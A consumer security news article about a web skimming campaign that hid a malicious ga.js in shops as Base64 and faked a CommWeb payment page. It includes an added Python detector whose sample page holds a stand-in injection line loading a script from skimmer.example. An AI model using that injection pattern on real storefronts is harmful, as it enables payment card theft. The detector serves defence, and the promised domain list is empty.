Beware of New Web Skimming Tactic


Online sellers and buyers are advised to be extra cautious when making transactions on the internet as web skimmers are at it again.

While eCommerce businesses and shoppers are busy preparing for the holidays, cybercriminals have found a new way to steal customers’ personal information like credit card details through a fraudulent payment service platform (PSP).

These skimmers would construct a page that looks exactly like a legit payments platform and wait for their unsuspecting victim to enter their payment details. Once they have collected the customer’s data, they are free to do whatever they wish to do with it.

Malware Attack via Phishing Site

A group of fraudsters that use a network of domain names to skim payment information on vulnerable sites was recently discovered by anti-malware software provider, Malwarebytes Labs.

According to the company, most of the domains were registered through the email address [email protected][.]com and come with a malicious ga.js file.

It further explained that the file is injected into compromised online shops by inserting a one-line piece of code containing the remote script in Base64 encoded form.
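One way a shop owner could check page templates for the kind of injection described above (an added example, not code from the article or from Malwarebytes Labs). The article does not show the injected line itself, so the sample page, the `ALLOWED_HOSTS` list and the placeholder host `skimmer.example` are assumptions constructed for illustration:

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Assumption: the hosts this shop legitimately loads scripts from.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

# A quoted run of Base64 characters long enough to hold a URL.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")
# An absolute or scheme-relative URL that points at a .js file.
SCRIPT_URL = re.compile(r"""(?:https?:)?//[\w.-]+/[^\s"'<>]*\.js\b""")


def decode_b64(token):
    """Return the decoded ASCII text, or None if the token is not Base64 text."""
    try:
        padded = token + "=" * (-len(token) % 4)
        return base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_hidden_script_urls(page_source, allowed_hosts=ALLOWED_HOSTS):
    """Return (line_no, url, host) for Base64 literals hiding an unlisted .js URL."""
    findings = []
    for line_no, line in enumerate(page_source.splitlines(), start=1):
        for match in B64_LITERAL.finditer(line):
            decoded = decode_b64(match.group(1))
            if decoded is None:
                continue
            for url in SCRIPT_URL.findall(decoded):
                host = urlparse(url).hostname
                if host not in allowed_hosts:
                    findings.append((line_no, url, host))
    return findings


def _b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed sample page; skimmer.example is a placeholder host.
SAMPLE_PAGE = "\n".join([
    '<script src="https://cdn.shop.example/js/theme.js"></script>',
    '<script>load(atob("%s"));</script>' % _b64("https://cdn.shop.example/js/tracking.js"),
    '<script>var s=document.createElement("script");s.src=atob("%s");'
    'document.head.appendChild(s);</script>' % _b64("https://skimmer.example/ga.js"),
])

if __name__ == "__main__":
    for finding in find_hidden_script_urls(SAMPLE_PAGE):
        print("line %d: hidden script %s (host %s)" % finding)
```

Only the third line of the sample is reported: the plain script tag is not Base64, and the second line decodes to a host on the allowlist.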

“One of several newly-registered domain names we came across had a skimmer that fit the same template, hosted at payment-mastercard[.]com/ga.js. However, one thing we noticed is that the payment-mastercard[.]com domain was also hosting a completely different kind of skimmer that at first resembled a phishing site.” – Malwarebytes Labs

The company was referring to a copycat of CommWeb, a payment gateway of Australia’s Commonwealth Bank, which targets an online store running on the PrestaShop eCommerce platform.

What’s alarming about the fraudulent site is its ability to validate the user’s information to make them think that they are indeed on a legit payments platform.

Don’t Be a Skimming Victim

The hackers did such an excellent job of replicating the payments page of Commonwealth Bank’s website that no customer would have second thoughts about entering their payment details into the page.

Once the fake web page has obtained a customer’s information, the latter will be redirected to the real payment page and required to supply their payment information all over again, unaware that they have just been scammed.

To avoid falling victim to web skimming, always check the URL of the payments page you’re on, especially if you were redirected from a merchant’s site.

Also, make sure to take note of the following domains as they contain malware:


Have you ever been a victim of web skimming before?
